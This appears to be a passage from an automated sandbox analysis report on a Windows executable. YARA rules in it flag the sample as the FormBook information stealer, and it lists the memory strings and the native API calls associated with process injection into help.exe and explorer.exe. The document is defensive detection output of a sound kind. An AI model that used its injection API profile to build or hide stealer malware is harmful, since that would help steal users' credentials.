          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017799D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779A10 NtQuerySection,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779560 NtWriteFile,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017795F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177A770 NtOpenThread,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779760 NtOpenProcess,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017796D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A81B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A8260 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A82E0 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A8390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 0_2_00469272
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 0_2_00C8C508
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 0_2_0046208E
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 2_2_003F911F
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 2_2_003F2050
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B960
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041C212
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041CB21
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00408C50
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B493
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00402D88
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041CE0C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041CF16
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00BC911F
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173F900
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018020A8
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018028EC
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1002
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180E824
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174B090
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F03DA
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01802B28
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FDBD2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176EBB0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018022AE
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01730D20
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018025DD
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01802D07
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174D5E0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01801D55
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FD466
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174841F
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180DFCE
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01801FF1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01756E30
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FD616
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01802EF7
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00BC2050
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E922AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8DBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E92B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E928EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E920A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB090
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9E824
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81002
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCF900
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E92EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8D616
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E91FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8D466
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E925DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDD5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E91D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E92D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC0D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003ACB21
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_00398C50
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_00392D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_00392D88
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003ACE0C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003ACF16
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_00392FB0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: String function: 0173B150 appears 45 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02DCB150 appears 35 times
          Source: s6G3ZtvHZg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: s6G3ZtvHZg.exe, 00000000.00000002.259685906.0000000007520000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000000.00000000.234473638.0000000000524000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000000.00000002.258856185.0000000006E40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000000.00000002.259599436.0000000007420000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000002.00000002.248880539.00000000004B4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000003.00000002.294686922.00000000019BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000003.00000000.249711283.0000000000C84000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exeBinary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
